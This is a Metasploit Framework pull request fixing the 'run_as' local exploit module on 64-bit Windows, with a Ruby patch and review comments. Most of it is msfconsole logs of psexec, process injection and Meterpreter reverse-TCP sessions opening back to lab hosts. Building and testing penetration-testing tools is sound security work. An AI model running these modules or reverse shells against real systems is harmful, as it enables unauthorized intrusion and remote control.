Fix `run_as` local exploit module on x64 systems
rapid7/metasploit-framework pull request #16718
Opened 2022-06-27 12:39 UTC by cdelafuente-r7

This fix the `run_as` local exploit module that was not working on x64 Windows when injecting a payload in a `notepad.exe` process. Before this fix, the module failed because the created process had the wrong architecture.

## Verification

- [ ] Start `msfconsole`
- [ ] Get a session 
- [ ] set the payload option to a Meterpreter payload
- [ ] run `run session=<session ID> user=<username> password=<password>`
- [ ] **Verify** a new session is created
- [ ] **Verify** the user and the architecture for this session

# Example output
## Before the fix
### Windows 10 x64 - x86 Session
```
msf6 exploit(windows/local/run_as) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN10-X64\normaluser
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/local/run_as) >
msf6 exploit(windows/local/run_as) >
msf6 exploit(windows/local/run_as) > run session=1 user=msfuser password=123456

[-] Handler failed to bind to 192.168.0.57:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[+] Process started successfully, PID: 7808
[-] Unable to create remote thread in target process: Access is denied.
[*] Exploit completed, but no session was created.
```

### Windows 10 x64 - x64 Session
```
msf6 exploit(windows/local/run_as) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10-X64\normaluser
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/local/run_as) > run session=1 payload=windows/x64/meterpreter/reverse_tcp user=msfuser password=123456

[-] Handler failed to bind to 192.168.0.57:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[+] Process started successfully, PID: 772
[+] Started thread in target process
[*] Exploit completed, but no session was created.
```

## With this fix
### Windows 10 x86 - x86 Session
```
msf6 exploit(windows/local/run_as) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10-X86
OS              : Windows 10 (10.0 Build 16299).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN10-X86\normaluser
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/local/run_as) > run session=1 user=msfuser password=123456

[-] Handler failed to bind to 192.168.0.57:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[+] Process started successfully, PID: 6604
[*] Sending stage (175686 bytes) to 192.168.0.122
[+] Started thread in target process
[*] Meterpreter session 2 opened (192.168.0.57:4444 -> 192.168.0.122:50263) at 2022-06-27 06:33:07 -0400
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/run_as) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN10-X86
OS              : Windows 10 (10.0 Build 16299).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN10-X86\msfuser
```

### Windows 10 x64 - x86 Session
```
msf6 exploit(windows/local/run_as) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN10-X64\normaluser
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/local/run_as) > run session=1 user=msfuser password=123456

[-] Handler failed to bind to 192.168.0.57:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[+] Process started successfully, PID: 8020
[*] Sending stage (175686 bytes) to 192.168.0.143
[+] Started thread in target process
[*] Meterpreter session 2 opened (192.168.0.57:4444 -> 192.168.0.143:49882) at 2022-06-27 06:38:33 -0400
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/run_as) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN10-X64\msfuser
```

### Windows 10 x64 - x64 Session
```
msf6 exploit(windows/local/run_as) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10-X64\normaluser
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/local/run_as) > run session=1 user=msfuser password=123456 payload=windows/x64/meterpreter/reverse_tcp

[-] Handler failed to bind to 192.168.0.57:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[+] Process started successfully, PID: 776
[*] Sending stage (200774 bytes) to 192.168.0.143
[+] Started thread in target process
[*] Meterpreter session 2 opened (192.168.0.57:4444 -> 192.168.0.143:49885) at 2022-06-27 06:41:04 -0400
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/run_as) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10-X64\msfuser
```

2022-06-28 19:12 UTC, smcintyre-r7 approved these changes
Changes look good, I was able to reproduce the original issue and verify this patch fixes it. Thanks!

2022-06-28 20:13 UTC, smcintyre-r7 requested changes
Sorry, actually after looking at this a bit more I started to notice some more arch related issues. So the `Msf::Post::Windows::Runas` module that powers this appears to completely neglect any 64-bit support. I'm surprised things even work.

The problems manifest themselves in a few ways. Because the STARTUP_INFO struct is off, the flags to hide notepad are ignored so the GUI pops up on the remote host. Because the PROCESS_INFORMATION struct is off, the values are incorrect including the thread handle, process ID and thread ID.

To fix these issues, I'd propose you apply this patch.

<details>
<summary>Patch</summary>

```diff
diff --git a/lib/msf/core/post/windows/runas.rb b/lib/msf/core/post/windows/runas.rb
index 22a6769402..72b984410f 100644
--- a/lib/msf/core/post/windows/runas.rb
+++ b/lib/msf/core/post/windows/runas.rb
@@ -79,7 +79,7 @@ module Msf::Post::Windows::Runas
      0, # hStdInput
      0, # hStdOutput
      0  # hStdError
-    ].pack('VVVVVVVVVVVVvvVVVV')
+    ].pack(session.arch == ARCH_X64 ? 'QQQQVVVVVVVVvvQQQQ' : 'VVVVVVVVVVVVvvVVVV')
   end
 
   #
@@ -113,7 +113,7 @@ module Msf::Post::Windows::Runas
                                                                       nil,
                                                                       nil,
                                                                       startup_info,
-                                                                      16)
+                                                                      session.arch == ARCH_X64 ? 24 : 16)
     if create_process['return']
       pi = parse_process_information(create_process['lpProcessInformation'])
       print_good("Process started successfully, PID: #{pi[:process_id]}")
@@ -173,7 +173,7 @@ module Msf::Post::Windows::Runas
                                                                       nil,
                                                                       nil,
                                                                       startup_info,
-                                                                      16)
+                                                                      session.arch == ARCH_X64 ? 24 : 16)
 
         if create_process['return']
           begin
@@ -210,7 +210,7 @@ module Msf::Post::Windows::Runas
     fail ArgumentError, 'process_information is nil' if process_information.nil?
     fail ArgumentError, 'process_information is empty string' if process_information.empty?
 
-    pi = process_information.unpack('VVVV')
+    pi = process_information.unpack(session.arch == ARCH_X64 ? 'Q<Q<VV' : 'VVVV')
     { :process_handle => pi[0], :thread_handle => pi[1], :process_id => pi[2], :thread_id => pi[3] }
   end

```
</details>

It's not the cleanest fix, but it should do the trick.

2022-06-28 20:19 UTC, smcintyre-r7 commented on modules/exploits/windows/local/run_as.rb
>          application_name = "#{windir}\\SysWOW64\\notepad.exe"
So using the railgun methods, I'm pretty sure that the session (`session.arch`), target process architecture and payload architecture (`payload.arch.first`) must all be the same. IIRC and from my brief testing attempts, even if the target arch and payload arch match, but the session is different, the railgun methods to inject the shellcode will fail. I'd suggest adding a check here to ensure that everything matches and fail with bad config otherwise.

With that assertion met, you can then actually use the `#get_notepad_pathname` method from the `Msf::Post::Windows::Process` mixin.

Combined those changes would look like:

```suggestion
      fail_with(Failure::BadConfig, 'The payload architecture must match the current session architecture.') unless session.arch == payload.arch.first
      application_name = get_notepad_pathname(session.arch, get_env('windir'), payload.arch.first)
```

2022-06-29 17:22 UTC, cdelafuente-r7 commented
Thanks for the review @smcintyre-r7 ! I think I've addressed everything in [0e3fdd0](https://github.com/rapid7/metasploit-framework/pull/16718/commits/0e3fdd07998c726613454f61c56c6d39deab45dc).

2022-07-08 13:21 UTC, smcintyre-r7 approved these changes
Everything looks good now. It's working when it's supposed to and handling architecture mismatches as it's expected to.

Tested:
* :green_circle: 64 on 64 via Windows Server 2019
* :green_circle: 32 on 64 via Windows Server 2019
* :green_circle: 32 on 32 via Windows 7 SP1

64 on 32 fails as expected because the payload doesn't match the session architecture and the session architecture will never be 64.

In all cases I checked that the notepad windows was hidden and that the PID was properly reported.

<details>
<summary>Testing Output</summary>

## 64-bit on Server 2019

In the background I created a notepad process to migrate into to drop SYSTEM privileges. I also closed the original notepad process after running the module which is why you see the session was closed.
```
msf6 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.96:445 - Connecting to the server...
[*] 192.168.159.96:445 - Authenticating to 192.168.159.96:445 as user 'smcintyre'...
[*] 192.168.159.96:445 - Selecting PowerShell target
[*] 192.168.159.96:445 - Executing the payload...
[+] 192.168.159.96:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 192.168.159.96
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.96:49839) at 2022-07-08 08:56:46 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-3MSP8K2LCGC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > background 
[*] Backgrounding session 4...
msf6 exploit(windows/smb/psexec) > previous 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/run_as) > show options 

Module options (exploit/windows/local/run_as):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   APPLICATION_NAME                     no        Application to be executed (lpApplicationName)
   COMMAND_LINE                         no        Command line to execute (lpCommandLine)
   DOMAIN                               no        Domain to login with
   PASSWORD            Password1!       yes       Password to login with
   SESSION             -1               yes       The session to run this module on
   USER                smcintyre        yes       Username to login with
   USE_CUSTOM_COMMAND  false            yes       Specify custom APPLICATION_NAME and COMMAND_LINE


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/run_as) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/local/run_as) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[-] Exploit aborted due to failure: no-access: Cannot use this technique as SYSTEM
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/run_as) > sessions -i -1
[*] Starting interaction with 4...

meterpreter > migrate 5460
[*] Migrating from 752 to 5460...
[*] Migration completed successfully.
meterpreter > background 
[*] Backgrounding session 4...
msf6 exploit(windows/local/run_as) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[-] Exploit aborted due to failure: bad-config: The payload architecture must match the current session architecture.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/run_as) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/run_as) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[+] Process started successfully, PID: 6680
[*] Sending stage (200774 bytes) to 192.168.159.96
[+] Started thread in target process
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.96:49841) at 2022-07-08 08:57:47 -0400

meterpreter > [*] 192.168.159.96 - Meterpreter session 4 closed.  Reason: Died

meterpreter > sysinfo
Computer        : WIN-3MSP8K2LCGC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.96 - Meterpreter session 5 closed.  Reason: Died
msf6 exploit(windows/local/run_as) >
```

## 32-bit on Windows 7 SP1

```
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.24:445 - Connecting to the server...
[*] 192.168.159.24:445 - Authenticating to 192.168.159.24:445 as user 'smcintyre'...
[*] 192.168.159.24:445 - Selecting PowerShell target
[*] 192.168.159.24:445 - Executing the payload...
[*] Sending stage (175686 bytes) to 192.168.159.24
[+] 192.168.159.24:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.24:49158) at 2022-07-08 09:14:47 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                  x86   0
 268   4     smss.exe                x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 344   488   dllhost.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\dllhost.exe
 356   340   csrss.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 408   340   wininit.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 416   400   csrss.exe               x86   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 472   400   winlogon.exe            x86   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 488   408   services.exe            x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 496   408   lsass.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 504   408   lsm.exe                 x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 632   488   svchost.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 700   488   svchost.exe             x86   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 752   488   svchost.exe             x86   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 844   488   svchost.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 912   488   svchost.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 972   752   audiodg.exe             x86   0
 1028  488   svchost.exe             x86   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1104  488   msdtc.exe               x86   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 1180  632   WmiPrvSE.exe            x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wbem\wmiprvse.exe
 1184  488   s [...]

2022-07-08 13:23 UTC, merged

2022-07-08 13:23 UTC, smcintyre-r7 commented
# Release Notes
This fixes the run_as library and module to work correctly on 64-bit systems.